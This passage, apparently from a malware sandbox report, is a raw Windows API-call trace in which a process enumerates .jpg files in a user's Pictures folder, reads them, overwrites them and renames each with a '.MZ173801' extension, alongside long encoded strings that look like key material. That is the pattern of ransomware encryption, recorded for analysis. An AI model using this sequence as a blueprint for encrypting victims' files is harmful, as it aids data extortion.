lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x366a1b00, ftCreationTime.dwHighDateTime=0x1d5e8ac, ftLastAccessTime.dwLowDateTime=0xb429fb70, ftLastAccessTime.dwHighDateTime=0x1d5f039, ftLastWriteTime.dwLowDateTime=0xb429fb70, ftLastWriteTime.dwHighDateTime=0x1d5f039, nFileSizeHigh=0x0, nFileSizeLow=0x5b74)) returned 1 [0115.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.916] GetCurrentThreadId () returned 0x1358 [0115.916] GetCurrentThreadId () returned 0x1358 [0115.916] GetCurrentThreadId () returned 0x1358 [0115.916] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.916] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.917] GetCurrentThreadId () returned 0x1358 [0115.917] GetCurrentThreadId () returned 0x1358 [0115.917] GetCurrentThreadId () returned 0x1358 [0115.917] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\dzGys1Cl.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dzgys1cl.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.917] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.917] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.917] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x5b74 [0115.917] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.917] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x5b74, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x5b74, lpOverlapped=0x0) returned 1 [0115.918] CloseHandle (hObject=0x3d0) returned 1 [0115.918] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\dzGys1Cl.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dzgys1cl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.919] WriteFile (in: hFile=0x3d0, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x5b74, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f6f0*=0x5b74, lpOverlapped=0x0) returned 1 [0115.920] CloseHandle (hObject=0x3d0) returned 1 [0115.922] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\dzGys1Cl.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dzgys1cl.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\dzGys1Cl.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dzgys1cl.jpg.mz173801")) returned 1 [0115.922] GetCurrentThreadId () returned 0x1358 [0115.922] GetCurrentThreadId () returned 0x1358 [0115.922] GetCurrentThreadId () returned 0x1358 [0115.922] GetCurrentThreadId () returned 0x1358 [0115.922] GetCurrentThreadId () returned 0x1358 [0115.922] GetCurrentThreadId () returned 0x1358 [0115.922] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a15ee0, ftCreationTime.dwHighDateTime=0x1d5ebde, ftLastAccessTime.dwLowDateTime=0xaaf36460, ftLastAccessTime.dwHighDateTime=0x1d5e954, ftLastWriteTime.dwLowDateTime=0xaaf36460, ftLastWriteTime.dwHighDateTime=0x1d5e954, nFileSizeHigh=0x0, nFileSizeLow=0x1613e, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="eT6BMD39LltKR7xUw6.jpg", cAlternateFileName="ET6BMD~1.JPG")) returned 1 [0115.922] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.922] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.923] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\eT6BMD39LltKR7xUw6.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\et6bmd39lltkr7xuw6.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a15ee0, ftCreationTime.dwHighDateTime=0x1d5ebde, ftLastAccessTime.dwLowDateTime=0xaaf36460, ftLastAccessTime.dwHighDateTime=0x1d5e954, ftLastWriteTime.dwLowDateTime=0xaaf36460, ftLastWriteTime.dwHighDateTime=0x1d5e954, nFileSizeHigh=0x0, nFileSizeLow=0x1613e)) returned 1 [0115.923] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.923] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.923] GetCurrentThreadId () returned 0x1358 [0115.923] GetCurrentThreadId () returned 0x1358 [0115.923] GetCurrentThreadId () returned 0x1358 [0115.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.924] GetCurrentThreadId () returned 0x1358 [0115.924] GetCurrentThreadId () returned 0x1358 [0115.924] GetCurrentThreadId () returned 0x1358 [0115.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\eT6BMD39LltKR7xUw6.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\et6bmd39lltkr7xuw6.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.924] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.924] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.924] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x1613e [0115.924] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.924] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1613e, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x1613e, lpOverlapped=0x0) returned 1 [0115.926] CloseHandle (hObject=0x3d0) returned 1 [0115.927] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\eT6BMD39LltKR7xUw6.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\et6bmd39lltkr7xuw6.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, 